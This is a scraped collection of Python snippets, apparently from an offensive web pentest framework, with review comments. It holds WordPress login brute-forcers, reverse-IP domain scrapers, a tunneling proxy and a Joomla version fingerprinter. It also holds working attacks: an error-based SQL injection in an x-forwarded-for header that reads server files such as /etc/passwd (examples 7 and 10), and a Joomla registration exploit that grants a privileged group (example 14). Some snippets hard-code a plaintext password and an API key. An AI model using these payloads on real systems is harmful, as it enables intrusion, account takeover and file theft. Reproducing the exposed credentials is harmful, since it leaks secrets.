Esempio n. 1
0
	def run(self, frmwk, args):
		"""Pre-configure and launch the ``attack/web_bruter`` module for a WordPress-style login form.

		Builds the POST body with ``__USER__``/``__PASS__`` placeholders, copies this module's
		options (plus whatever ``Cookie`` header the HTTP wrapper holds) into the bruter's
		option tables, runs it, then reloads it so the injected defaults do not persist.

		Args:
			frmwk: framework object; provides ``print_status``, ``modules`` and ``reload_module``.
			args: unused.

		Returns:
			None; results are whatever the delegated module reports itself.
		"""
		module_name		= 'attack/web_bruter'

		frmwk.print_status('Init paprams!')
		# NOTE(review): presumably the wrapper contacts the URL here so that a session cookie
		# lands in victim.headers — confirm against HTTP.__init__; nothing in this block reads
		# any other attribute of `victim`.
		victim				= HTTP(self.options['URL'], timeout = self.advanced_options['TIMEOUT'])
		victim.storecookie	= True
		checktype			= 'successstr'
		tokenstr			= 'no-unread-messages'

		# Form body handed to the bruter as DATA; the placeholders are assumed to be substituted
		# per attempt by attack/web_bruter (not visible here).
		param		= 'log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to='+quote_plus(self.options['URL'])+'&testcookie=1'
		frmwk.print_status('Start bruteforcer!')
		bruter	= frmwk.modules[module_name]
		bruter.options.addString('URL', 'Link login', default = self.options['URL'])
		bruter.options.addString('USERNAME', 'Account login', default = self.options['USERNAME'])
		bruter.options.addString('PASSWORD', 'Password login', default = self.options['PASSWORD'])
		bruter.options.addString('DATA', 'Date with POST method', default = param)
		bruter.options.addString('CHECKTYPE', 'Type of checker success login', default = checktype)
		bruter.options.addString('TOKEN', 'Error string', default = tokenstr)
		# NOTE(review): the three help strings below are copy-pasted/swapped (THREADS is not a
		# POST body, USERLIST holds usernames, PASSLIST passwords). Only the displayed help is
		# wrong — the option *names* are what the module reads.
		bruter.options.addInteger('THREADS', 'Date with POST method', default = self.options['THREADS'])
		bruter.options.addPath('USERLIST', 'passwords to test', default = self.options['USERLIST'])
		bruter.options.addPath('PASSLIST', 'usernames to test', default = self.options['PASSLIST'])
		bruter.options.addBoolean('VERBOSE', 'Verbose', default = self.options['VERBOSE'])
		# NOTE(review): victim.headers['Cookie'] raises KeyError when no Cookie header was
		# captured, so the None fallback is only reachable for an empty value; .get('Cookie')
		# would make the intent work.
		bruter.advanced_options.addString('COOKIE', 'Cookie', default = victim.headers['Cookie'] if victim.headers['Cookie'] else None)
		bruter.advanced_options.addInteger('DELAY', 'Delay time', default = self.advanced_options['DELAY'])
		bruter.advanced_options.addInteger('TIMEOUT', 'Time out request', default = self.advanced_options['TIMEOUT'])
		bruter.advanced_options.addBoolean('STOP', 'Stop scanning', default = True)
		bruter.run(frmwk, None)
		# Reload so the defaults registered above do not leak into a later, unrelated run (assumed).
		frmwk.reload_module(module_name)
Esempio n. 2
0
 def Whoiswebhosting(self, searcher):
     """Collect domain names for ``self.ip`` from the whois.webhosting.info listing.

     The first page is always fetched; when it carries a "Last" page link, pages
     ``2 .. last-1`` are fetched too, stopping early if the site answers with its
     automated-search challenge page. All hits are appended to ``self.domains``
     and the count is reported through ``self.frmwk``.

     Args:
         searcher: dict with ``URL`` (a ``%``-format string taking ``(ip, page)``)
             and ``SITE`` (label used in the status line).
     """
     row_pattern = r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>'
     last_pattern = r'\?pi=([0-9]+)\&ob=SLD\&oo=DESC">\&nbsp\;\&nbsp\;Last\&nbsp\;&gt;\&gt\;<\/a>'
     client = HTTP(searcher['URL'])

     first_page = client.Request(searcher['URL'] % (self.ip, 1))
     last_link = search(last_pattern, first_page)
     found = []
     found += findall(row_pattern, first_page)

     if last_link:
         for page_no in range(2, int(last_link.group(1))):
             body = client.Request(searcher['URL'] % (self.ip, page_no))
             if search('The security key helps us prevent automated searches', body):
                 break
             found += findall(row_pattern, body)

     self.frmwk.print_status(self.fmt_string.format(searcher['SITE'], len(found)))
     self.domains += found
Esempio n. 3
0
    def run(self, frmwk, args):
        """Delegate to the ``attack/web_bruter`` module, pre-filled for a WordPress login form.

        The bruter's option tables receive this module's options, the login POST
        body (with ``__USER__``/``__PASS__`` placeholders) and the ``Cookie`` header
        held by the HTTP wrapper; afterwards the module is reloaded.

        Args:
            frmwk: framework object providing status output, ``modules`` and ``reload_module``.
            args: unused.
        """
        module_name = 'attack/web_bruter'

        frmwk.print_status('Init paprams!')
        victim = HTTP(self.options['URL'],
                      timeout=self.advanced_options['TIMEOUT'])
        victim.storecookie = True

        login_form = ('log=__USER__&pwd=__PASS__&wp-submit=Log+In&redirect_to='
                      + quote_plus(self.options['URL']) + '&testcookie=1')
        frmwk.print_status('Start bruteforcer!')
        bruter = frmwk.modules[module_name]
        opts, adv = bruter.options, bruter.advanced_options

        opts.addString('URL', 'Link login', default=self.options['URL'])
        opts.addString('USERNAME', 'Account login', default=self.options['USERNAME'])
        opts.addString('PASSWORD', 'Password login', default=self.options['PASSWORD'])
        opts.addString('DATA', 'Date with POST method', default=login_form)
        opts.addString('CHECKTYPE', 'Type of checker success login', default='successstr')
        opts.addString('TOKEN', 'Error string', default='no-unread-messages')
        # Help strings are kept as registered (they are displayed only); the option
        # names are what attack/web_bruter reads.
        opts.addInteger('THREADS', 'Date with POST method', default=self.options['THREADS'])
        opts.addPath('USERLIST', 'passwords to test', default=self.options['USERLIST'])
        opts.addPath('PASSLIST', 'usernames to test', default=self.options['PASSLIST'])
        opts.addBoolean('VERBOSE', 'Verbose', default=self.options['VERBOSE'])
        # Missing Cookie header raises KeyError here, exactly as before; an empty
        # value becomes None.
        adv.addString('COOKIE', 'Cookie', default=victim.headers['Cookie'] or None)
        adv.addInteger('DELAY', 'Delay time', default=self.advanced_options['DELAY'])
        adv.addInteger('TIMEOUT', 'Time out request', default=self.advanced_options['TIMEOUT'])
        adv.addBoolean('STOP', 'Stop scanning', default=True)

        bruter.run(frmwk, None)
        frmwk.reload_module(module_name)
Esempio n. 4
0
 def __init__(self, host, keyworld, limit, delay):
     """Initialise a search worker: quoted keyword, paging bounds and the HTTP client.

     Args:
         host: base host handed to the project's ``HTTP`` wrapper.
         keyworld: raw search keyword; stored URL-quoted.
         limit: upper bound for the result offset (consumed elsewhere, e.g. a run loop).
         delay: pause between pages (consumed elsewhere).
     """
     super().__init__()
     # Per-instance mutable state: parsed records, current offset, page step.
     self.info = []
     self.count = 0
     self.step = 10
     self.limit, self.delay = limit, delay
     self.keyworld = quote_plus(keyworld)
     self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot')
Esempio n. 5
0
	def eWhois(self, searcher):
		"""Log in to ewhois.com with a fixed account and pull its IP-address export for ``self.ip``.

		Hits are appended to ``self.domains``; the count is reported via ``self.frmwk``.

		Args:
			searcher: dict; only ``SITE`` is read here (label for the status line).
		"""
		# NOTE(review): credentials are hard-coded in source (the e-mail is already redacted
		# here, the password is not). Move them to the configuration layer the rest of the
		# framework uses (see CONFIG elsewhere in this file) and keep them out of the repo.
		params				= urlencode({'_method':'POST','data[User][email]':'*****@*****.**','data[User][password]':'RitX:::R1tX','data[User][remember_me]':'0'})
		req					= HTTP("http://www.ewhois.com/")
		req.storecookie		= True
		req.rand_useragent	= False
		# NOTE(review): the login response is discarded and never checked; a failed login
		# silently produces an empty (or error-page) export below.
		data				= req.Request('http://www.ewhois.com/login/', 'POST', params)
		data				= req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip)
		urls				= findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""',data)
		self.frmwk.print_status(self.fmt_string.format(searcher['SITE'],urls.__len__()))
		self.domains		+= urls
Esempio n. 6
0
 def BingApi(self, searcher):
     """Query the Bing web-search API for ``self.ip`` and collect the host part of every result URL.

     Pages are fetched until the ``<web:Total>`` count is covered (50 results per page);
     hosts are appended to ``self.domains`` and counted via ``self.frmwk``.

     Args:
         searcher: dict with ``URL`` (``%``-format string taking ``(key, ip, page)``) and ``SITE``.
     """
     # NOTE(review): API key committed in source. Treat it as leaked (rotate it) and load it
     # from the configuration layer instead of a literal.
     KEY = "49EB4B94127F7C7836C96DEB3F2CD8A6D12BDB71"
     req = HTTP(searcher['URL'])
     data = req.Request(searcher['URL'] % (KEY, self.ip, 0))
     # NOTE(review): search() returns None when the tag is absent (error page, quota
     # exceeded), so .group(1) raises AttributeError. Also a non-raw pattern: '\/' is an
     # invalid escape that newer Pythons warn about — use r'...'.
     total = search('<web:Total>([0-9]+)<\/web:Total>', data).group(1)
     # Number of 50-result pages to request after the first one.
     page = int(int(total) / 50 + 1)
     for i in range(1, page):
         data += req.Request(searcher['URL'] % (KEY, self.ip, i))
     result = findall(r'<web:Url>(.+?)<\/web:Url>', data)
     urls = []
     for url in result:
         # scheme://host/rest -> host
         urls.append(url.split('/', 3)[2])
     self.frmwk.print_status(
         self.fmt_string.format(searcher['SITE'], urls.__len__()))
     self.domains += urls
Esempio n. 7
0
class Module(Templates):
	"""Module that sends a crafted ``x-forwarded-for`` header carrying the FILE option and prints
	whatever the error-message regex captures, 62 characters per round, until nothing matches.
	"""
	def __init__(self, *args, **kwargs):
		super().__init__(*args, **kwargs)
		self.version		= 1
		self.author			= [ 'Kid' ]
		# NOTE(review): both descriptions are copy-pasted from an unrelated (meter-information)
		# module and do not describe what run() does.
		self.description 	= 'Get Basic Meter Information By Reading Tables'
		self.detailed_description	= 'This module retreives some basic meter information and displays it in a human-readable way.'
		
		# Only user-controlled input of the module; folded into the header built in run().
		self.options.addString('FILE', 'domain/ip', default = '/etc/passwd')

	def run(self, frmwk, args):
		"""Loop over 62-character windows, writing each captured fragment to stdout.

		Args:
			frmwk: unused here.
			args: unused.
		"""
		# NOTE(review): fixed URL looks like a placeholder left from development; nothing makes it
		# configurable, so the module as committed cannot target anything else.
		url = 'http://www.google.com/'
		self.victim		= HTTP(url)
		# NOTE(review): `len` shadows the builtin; it is the offset passed to the substring()
		# in the header and advances by 62 each round.
		len = 1
		# join	= ''
		while True:
			header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)}
			data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++",header = header)
			# print(data)
			# Termination relies solely on the regex ceasing to match; there is no round cap.
			res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL)
			if res:
				# join += res.group(1)
				stdout.write(res.group(1))
				stdout.flush()
			else:
				break
			len += 62
		# print('--------------data---------- : \n' + join)
Esempio n. 8
0
def Filter(domain, infos, type):
    """Extract sub-domains and e-mail addresses for ``domain`` from a list of search hits.

    Each hit is a dict with ``url`` and ``data`` (URL-encoded text); ``data`` is
    rewritten in place with its unquoted form. Hits already processed (by equality)
    are skipped. When a hit alone yields at least ``type`` domains or e-mails, the
    linked page is fetched and mined as well; any failure there is ignored and a
    2-second pause follows. A progress percentage is printed per hit.

    Args:
        domain: target domain the filters match against.
        infos: list of hit dicts (mutated: ``data`` is unquoted).
        type: threshold count that triggers fetching the hit's URL.

    Returns:
        ``(subs, emails)``: per-hit sorted-unique results, concatenated in hit order.
    """
    subs, emails, checked = [], [], []
    client = HTTP('https://docs.google.com/')
    total = len(infos)
    for position, hit in enumerate(infos, 1):
        print_process(int(position * 100 / total))
        if hit in checked:
            continue
        hit['data'] = unquote(hit['data'])
        domains = domain_filter(domain, unquote(hit['url']))
        domains += domain_filter(domain, hit['data'])
        mails = email_filter(domain, hit['data'])
        domains = sorted(set(realdomain(domains)))
        mails = sorted(set(realemail(mails)))
        if len(domains) >= type or len(mails) >= type:
            # Best-effort enrichment: a failed fetch or parse simply leaves the
            # per-hit lists as they are.
            try:
                page = getLink(client, hit['url'])
                domains += domain_filter(domain, page)
                mails += email_filter(domain, page)
            except Exception:
                pass
            sleep(2)
        subs += sorted(set(realdomain(domains)))
        emails += sorted(set(realemail(mails)))
        checked.append(hit)
    print_line('')
    return (subs, emails)
Esempio n. 9
0
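 def reverseip(self, searcher):
     """Run one reverse-IP source described by ``searcher`` and collect its domains.

     A source with an ``SP`` key delegates to that callable. Otherwise ``URL`` is
     requested (POST when ``DATA`` is present; both are ``%``-formatted with
     ``self.ip``), ``REGEX`` is applied to the body and the hits are appended to
     ``self.domains`` with a count reported through ``self.frmwk``.

     Args:
         searcher: dict with ``SITE`` and either ``SP`` or ``URL``/``REGEX``
             (plus optional ``DATA``).

     Returns:
         None. A failing source is reported via ``self.frmwk.print_error`` and
         skipped, instead of being silently swallowed as before.
     """
     try:
         if 'SP' in searcher:
             searcher['SP'](searcher)
             return
         req = HTTP(searcher['URL'])
         if 'DATA' in searcher:
             data = req.Request(searcher['URL'], 'POST',
                                searcher['DATA'] % self.ip)
         else:
             data = req.Request(searcher['URL'] % self.ip)
         urls = findall(searcher['REGEX'], data)
         self.frmwk.print_status(
             self.fmt_string.format(searcher['SITE'], len(urls)))
         self.domains += urls
     except Exception as e:
         # One broken source must not abort the scan, but its cause should be visible.
         self.frmwk.print_error('{0}: {1}'.format(searcher.get('SITE', '?'), e))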
Esempio n. 10
0
	def run(self, frmwk, args):
		"""Send a crafted ``x-forwarded-for`` header carrying the FILE option and write each
		regex-captured fragment to stdout, 62 characters per round, until nothing matches.

		Args:
			frmwk: unused here.
			args: unused.
		"""
		# NOTE(review): fixed URL looks like a placeholder left from development; nothing makes it
		# configurable, so the module as committed cannot target anything else.
		url = 'http://www.google.com/'
		self.victim		= HTTP(url)
		# NOTE(review): `len` shadows the builtin; it is the offset passed to the substring()
		# in the header and advances by 62 each round.
		len = 1
		# join	= ''
		while True:
			header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)}
			data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++",header = header)
			# print(data)
			# Termination relies solely on the regex ceasing to match; there is no round cap.
			res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL)
			if res:
				# join += res.group(1)
				stdout.write(res.group(1))
				stdout.flush()
			else:
				break
			len += 62
		# print('--------------data---------- : \n' + join)
Esempio n. 11
0
    def run(self, frmwk, args):
        """Entry point of the bruter: build the user/password lists from options, run
        THREADS worker threads (``self.worker``, defined elsewhere) and print the pairs
        collected in ``self.success``.

        Args:
            frmwk: framework object; stored on ``self`` for the workers' output.
            args: unused.
        """
        self.frmwk = frmwk
        self.victim = HTTP(self.options['URL'],
                           timeout=self.advanced_options['TIMEOUT'])
        self.victim.storecookie = True
        self.verbose = self.options['VERBOSE']

        self.userlist = []
        self.passlist = []
        self.success = []

        # Only inject a Cookie header when the caller supplied one.
        self.victim.headers.update({'Cookie': self.advanced_options['COOKIE']}
                                   if self.advanced_options['COOKIE'] else {})
        #######################################
        # Inline comma-separated values take precedence over the list files.
        if self.options['USERNAME']:
            self.userlist = self.options['USERNAME'].split(',')
        else:
            self.userlist = ReadFromFile(FullPath(self.options['USERLIST']))

        if self.options['PASSWORD']:
            self.passlist = self.options['PASSWORD'].split(',')
        else:
            for a in ReadFromFile(FullPath(self.options['PASSLIST'])):
                self.passlist.append(a)

        self.lenuser = len(self.userlist)
        self.lenpass = len(self.passlist)
        ###############################################
        listthread = []
        if len(self.userlist) > 0:
            # Shared scratch list for the workers (presumably the work queue — see worker()).
            self.temppass = []
            for i in range(self.options['THREADS']):
                t = Thread(target=self.worker)
                listthread.append(t)
                t.start()
            try:
                for t in listthread:
                    t.join()
            except KeyboardInterrupt:
                # NOTE(review): Thread.isAlive() was removed in Python 3.9 (is_alive()) and
                # threading.Thread has no terminate(); on Ctrl-C this handler raises
                # AttributeError instead of stopping the workers. Presumably the intent is a
                # stop flag the workers poll — confirm against worker().
                for t in listthread:
                    if t.isAlive():
                        t.terminate()
                pass
            ##############################################
            self.success = sorted(self.success)
            self.frmwk.print_line()
            self.frmwk.print_status("List login:\n-----------")
            if len(self.success) > 0:
                for u, p in self.success:
                    self.frmwk.print_success(
                        'SUCCESS:	username: {0:<20} password: {1}'.format(
                            u, p))
            self.frmwk.print_status("-----------")
        else:
            self.frmwk.print_status('Nothing to do!')
Esempio n. 12
0
    def run(self, frmwk, args):
        """Delegate to ``attack/web_bruter`` with this module's options, an empty POST body
        and ``self.initer`` as the bruter's init callback; the bruter's successes are kept
        in ``self.login``.

        Args:
            frmwk: framework object; stored on ``self`` and used for status output,
                ``modules`` and ``reload_module``.
            args: unused.
        """
        self.frmwk = frmwk
        self.module_name = 'attack/web_bruter'
        checktype = 'successstr'
        tokenstr = 'no-unread-messages'

        self.frmwk.print_status('Init paprams!')
        # NOTE(review): self.victim is created but not read again in this block; presumably
        # self.initer (not shown) uses it to build the request — confirm.
        self.victim = HTTP(self.options['URL'],
                           timeout=self.advanced_options['TIMEOUT'])
        self.victim.storecookie = True

        self.frmwk.print_status('Start bruteforcer!')
        brute = self.frmwk.modules[self.module_name]
        brute.options.addString('URL',
                                'Link login',
                                default=self.options['URL'])
        brute.options.addString('USERNAME',
                                'Account login',
                                default=self.options['USERNAME'])
        brute.options.addString('PASSWORD',
                                'Password login',
                                default=self.options['PASSWORD'])
        # DATA is left empty on purpose here (contrast with the WordPress variant elsewhere
        # in this file); the init callback below is presumably what fills the request in.
        brute.options.addString('DATA', 'Date with POST method', default='')
        brute.options.addString('CHECKTYPE',
                                'Type of checker success login',
                                default=checktype)
        brute.options.addString('TOKEN', 'Error string', default=tokenstr)
        # NOTE(review): help strings for THREADS/USERLIST/PASSLIST are copy-pasted or swapped;
        # only the displayed text is wrong, the option names are what the bruter reads.
        brute.options.addInteger('THREADS',
                                 'Date with POST method',
                                 default=self.options['THREADS'])
        brute.options.addPath('USERLIST',
                              'passwords to test',
                              default=self.options['USERLIST'])
        brute.options.addPath('PASSLIST',
                              'usernames to test',
                              default=self.options['PASSLIST'])
        brute.options.addBoolean('VERBOSE',
                                 'Verbose',
                                 default=self.options['VERBOSE'])
        brute.advanced_options.addString('COOKIE', 'Cookie', default=None)
        brute.advanced_options.addInteger(
            'DELAY', 'Delay time', default=self.advanced_options['DELAY'])
        brute.advanced_options.addInteger(
            'TIMEOUT',
            'Time out request',
            default=self.advanced_options['TIMEOUT'])
        brute.advanced_options.addBoolean('STOP',
                                          'Stop scanning',
                                          default=True)
        # Hook consumed by the bruter (assumed to run before the attempts start).
        brute.initcallbacker = self.initer
        brute.run(self.frmwk, None)
        self.login = brute.success
        # Reload so the defaults registered above do not persist into later runs (assumed).
        self.frmwk.reload_module(self.module_name)
Esempio n. 13
0
class Searcher(Thread):
    """Background worker that pages through a search backend and accumulates parsed hits.

    Subclasses must provide ``uriCreater``, ``Has_Next``, ``Getdata`` and ``Spliter``
    (none of them is defined here). Parsed records are collected in ``self.info``.
    """

    def __init__(self, host, keyworld, limit, delay):
        """Store paging parameters and build the HTTP client.

        Args:
            host: base host for the project's ``HTTP`` wrapper.
            keyworld: search keyword, kept URL-quoted.
            limit: result offset at which paging stops.
            delay: seconds slept between pages.
        """
        super().__init__()
        self.keyworld = quote_plus(keyworld)
        self.limit, self.delay = limit, delay
        self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot')
        # Offset reached so far, records gathered, and how far the last page advanced us.
        self.count, self.info, self.step = 0, [], 10

    def run(self):
        """Thread body: fetch pages until there is no next page, the offset stalls, or the limit is hit."""
        while True:
            printer.print_line('\t{0:<25} {1:d}'.format(self.name, self.count))
            page = self.do_search(self.uriCreater())
            if not self.Has_Next(page) or self.count <= 1:
                break
            self.count += self.step
            if self.count >= self.limit:
                break
            sleep(self.delay)

    def do_search(self, uri):
        """Fetch ``uri``; on a non-empty body parse it and split the records into ``self.info``.

        Returns:
            The raw body, or ``''`` when ``Getdata`` raised (reported via ``printer``).
        """
        body = self.request.Request(uri)
        if body == '':
            return body
        try:
            records = self.Getdata(body)
        except Exception:
            printer.print_error('%s : Nothing to do !' % self.name)
            return ''
        self.do_split(records)
        return body

    def do_split(self, info):
        """Apply ``Spliter`` to each stripped record; keep successes, report failures, set ``step``."""
        parsed = []
        for raw in info:
            try:
                parsed.append(self.Spliter(raw.strip()))
            except Exception as err:
                printer.print_error('%s Error : %s\ncontent: %s' %
                                    (self.name, err, raw))
        self.info += parsed
        # Next offset increment equals the number of usable records on this page.
        self.step = len(parsed)
Esempio n. 14
0
	def run(self, frmwk, args):
		"""Register an account on a Joomla ``com_users`` registration endpoint and try to confirm
		it through the activation mail fetched with ``self.getMail``.

		Args:
			frmwk: framework object used for status/success/error output.
			args: unused.
		"""
		url 				= self.options['URL']
		email 				= CONFIG.GMAIL_ACCOUNT[0]
		# NOTE(review): '******' looks like a redaction or placeholder rather than a real
		# value; as committed, the password is the literal six asterisks.
		self.username		= '******' + str(randint(1000,100000))
		self.password 		= '******'
		victim				= HTTP(url)
		victim.storecookie	= True
		exploit				= 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'
		registry			= 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email)
		
		frmwk.print_status('Init token')
		data	= victim.Request(url)
		# The form's 32-char hidden token field; empty string when the page does not carry one.
		token	= search('name="([a-zA-Z0-9]{32})"\svalue="1"', data)
		if token:
			token	= token.group(1)
		else:
			token	= ''
		frmwk.print_status('Send false request')
		url	= url + '?task=registration.register'
		victim.Request(url, 'POST', exploit + token + '=1')
		frmwk.print_status('Send exploit request')
		data	= victim.Request(url, 'POST', registry + token + '=1')

		warning	= search('class="warning\smessage">(.*?)</dd>', data, DOTALL)
		message	= search('class="message\smessage">(.*?)</dd>', data, DOTALL)
		if warning:
			frmwk.print_error('Error during exploit : ' + warning.group(1))
			return
		elif message:
			frmwk.print_success('Successful : ' + message.group(1).strip())
			frmwk.print_success('Account login: %s | %s' % (self.username, self.password))
		else:
			frmwk.print_status('Hên xui !')
		
		frmwk.print_status('Sleep 30s for mail receiver !')
		sleep(30)
		# NOTE(review): the loop variable shadows the `email` address bound above (harmless
		# here, it is not read again). `active_link` is only bound inside the `if active:`
		# branch, so when no mail matches the check below raises NameError — initialise it
		# to None before the loop.
		for email in self.getMail():
			active	= search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL)
			if active:
				active_link	= active.group(1)
				frmwk.print_status('Active link: ' + active_link)
				break
		if active_link:
			data	= victim.Request(active_link)
			message	= search('class="message\smessage">(.*?)</dd>', data, DOTALL)
			if message:
				frmwk.print_success('Actived Account: %s | %s' % (self.username, self.password))
Esempio n. 15
0
 def eWhois(self, searcher):
     """Log in to ewhois.com with a fixed account and pull its IP-address export for ``self.ip``.

     Hits are appended to ``self.domains``; the count is reported via ``self.frmwk``.

     Args:
         searcher: dict; only ``SITE`` is read here (label for the status line).
     """
     # NOTE(review): credentials are hard-coded in source (the e-mail is already redacted,
     # the password is not). Move them to the configuration layer the rest of the framework
     # uses (see CONFIG elsewhere in this file) and keep them out of the repo.
     params = urlencode({
         '_method': 'POST',
         'data[User][email]': '*****@*****.**',
         'data[User][password]': 'RitX:::R1tX',
         'data[User][remember_me]': '0'
     })
     req = HTTP("http://www.ewhois.com/")
     req.storecookie = True
     req.rand_useragent = False
     # NOTE(review): the login response is overwritten without being checked; a failed login
     # silently yields an empty (or error-page) export below.
     data = req.Request('http://www.ewhois.com/login/', 'POST', params)
     data = req.Request("http://www.ewhois.com/export/ip-address/%s/" %
                        self.ip)
     urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data)
     self.frmwk.print_status(
         self.fmt_string.format(searcher['SITE'], urls.__len__()))
     self.domains += urls
Esempio n. 16
0
    def worker(self, c_conn, c_addr):
        """Serve one accepted client socket by relaying its HTTP request through a tunnel.

        Reads the client's request line and headers, picks a tunnel, sends an init record
        followed by the (optionally transformed) request, then streams the tunnel's reply
        back to the client. Both connections are closed before returning.

        Args:
            c_conn: accepted client socket (must support ``recv``/``send``/``close``).
            c_addr: peer address, used only for log lines.

        Returns:
            None. Early ``return None`` on tunnel failure or an unparseable request line.
        """
        self.frmwk.print_status("Accept new connect from  " + str(c_addr))
        ################### CONNET TUNNEL #####################
        ### choose and connect to a tunnel
        c_tunnel = self.choin_tunnel()  # pick one tunnel (URL, ?, key) — shape assumed from the indexes used below
        t_conn = HTTP(c_tunnel[0], timeout=self.connect_timout)

        ### check tunnel is open
        # NOTE(review): HTTP(...) is a constructor call; unless the wrapper overrides
        # __bool__/__len__, this test never fails — confirm against HTTP.
        if not t_conn:
            self.frmwk.print_error("Can't connect to tunnel")
            return None
        ### encrypt/decrypt init
        # tunnel_ks = self.vc_generatekeyhash(c_tunnel[2])
        # tunnel_pe = self.vc_init(c_tunnel[2],tunnel_ks)
        # tunnel_pd = dict((tunnel_pe[i],i) for i in range(0,len(tunnel_pe)))
        # NOTE(review): `crypton` / vc_encrypt / vc_decrypt are a project-defined transform
        # keyed by c_tunnel[2]; nothing here establishes it as a vetted cipher, so treat the
        # tunnel as obfuscated rather than confidential until that code is reviewed.
        if self.encrypt:
            crypt = crypton(c_tunnel[2])
        else:
            crypt = None
        ################### START READ DATA CLIENT #####################
        ### get status line, headers and declared body length from the client socket
        c_status, c_headers, c_content_len = self.socket_receiver(c_conn)

        ### set url, host, port, method
        s_https = 0
        host = c_status[1]
        if host.startswith(b"http"):
            parser = parse.urlparse(host)
            s_host = parser.hostname
            s_port = parser.port
            # NOTE(review): an absolute URL without a path component (b"http://host") yields
            # fewer than four split parts, so [3] raises IndexError here.
            s_path = b"/" + host.split(b"/", 3)[3]
            if not s_port:
                if parser.scheme == "https":
                    s_port = 443
                else:
                    s_port = 80
            if parser.scheme == "https":
                s_https = 1
        else:
            self.frmwk.print_error("Unknown client request connect !")
            return None

        ### rebuild the request line with the path only (origin form)
        c_send_header = [b" ".join([c_status[0], s_path, c_status[2]])]

        ### set header for send
        c_headers.update({b"Connection": b"close"})  # fix host delay
        for k, v in c_headers.items():
            # Proxy-* headers are hop-by-hop and must not be forwarded.
            if k.startswith(b"Proxy"):
                continue
            c_send_header.append(k + b": " + v)

        ## join headers into the on-wire block
        c_send_header = b"\r\n".join(c_send_header) + b"\r\n\r\n"

        ### set init param of tunnel
        c_send_init = self.send_init(s_host, s_port, self.r_buffer, self.s_buffer, s_https, c_tunnel, crypt)

        ### init and send tunnel parameter
        # NOTE(review): str key "Content-Length" here while the client header dict above uses
        # bytes keys — presumably the wrapper normalises; confirm.
        t_conn.init(c_tunnel[0], "POST", {"Content-Length": len(c_send_init) + len(c_send_header) + c_content_len})
        t_conn.send(c_send_init)

        del c_send_init  # clear memory

        ### get content from client and send to server with r_buffer
        if c_content_len > 0:
            c_sent = 0
            ####### send header with content for full r_buffer encrypt
            if self.encrypt:
                # Pad the header with the first body bytes so the transformed length is a
                # multiple of the key length (intent inferred from the modulo; confirm).
                mod_len = len(c_send_header) % len(c_tunnel[2])
                # NOTE(review): when mod_len is 0, recv(0) returns b"" — fine, but the slice
                # below uses `data_len - i` as its upper bound, which shrinks with i; for any
                # i > 0 that yields short or empty chunks. `min(i + self.r_buffer, data_len)`
                # is almost certainly what was meant.
                data = c_conn.recv(mod_len)
                data = c_send_header + data
                data_len = len(data)
                for i in range(0, data_len, self.r_buffer):
                    t_conn.send(crypt.vc_encrypt(data[i : min(i + self.r_buffer, data_len - i)]))
                c_sent = mod_len
            else:
                t_conn.send(c_send_header)

            ###### send the remaining body
            if c_sent < c_content_len:
                while True:
                    data = c_conn.recv(min(self.r_buffer, c_content_len - c_sent))
                    if self.encrypt:
                        t_conn.send(crypt.vc_encrypt(data))
                    else:
                        t_conn.send(data)

                    c_sent += len(data)
                    # NOTE(review): `content_lent` is not defined anywhere in this method —
                    # the first non-empty chunk raises NameError. It should read
                    # `c_sent == c_content_len`.
                    if not data or c_sent == content_lent:
                        break
        else:
            if self.encrypt:
                t_conn.send(crypt.vc_encrypt(c_send_header))
            else:
                t_conn.send(c_send_header)
        del c_send_header  # clear memory
        ############## END SEND ################
        ############# START RECV ###############
        # t_conn.recv(...) is iterated, so the wrapper presumably yields chunks of s_buffer bytes.
        try:
            for res_chunk in t_conn.recv(self.s_buffer):
                if self.encrypt:
                    c_conn.send(crypt.vc_decrypt(res_chunk))
                else:
                    c_conn.send(res_chunk)
        except Exception as e:
            self.frmwk.print_error(str(e))
        finally:
            t_conn.request.close()
            c_conn.close()

        self.frmwk.print_status("Closed connect from  " + str(c_addr))
Esempio n. 17
0
    def run(self, frmwk, args):
        """Fingerprint a Joomla installation's version from well-known static files.

        First pass: fetch each file in ``storeversion`` and map the first revision
        string found in its body to a version range. Second pass (only if nothing
        matched): read the ``<version>`` element from two XML manifests. The result
        is stored in ``self.version`` (``None`` when unknown) and printed.

        Args:
            frmwk: framework object used for status/success/error output.
            args: unused.
        """
        self.version = None
        url = self.options['URL']
        if not url.endswith('/'):
            url += '/'
        ###### dict from http://www.pepelux.org/programs/joomlascan/ #######
        # [path, [[revision string, version range], ...]] — the signature table.
        storeversion = [
            [
                'language/en-GB/en-GB.ini',
                [[
                    'version 1.5.x 2005-10-30 14:10:00',
                    '1.5.0.Beta-1.5.0.Beta'
                ], ['9913 2008-01-09 21:28:35Z', '1.5.0.Stable-1.5.0.Stable'],
                 ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'],
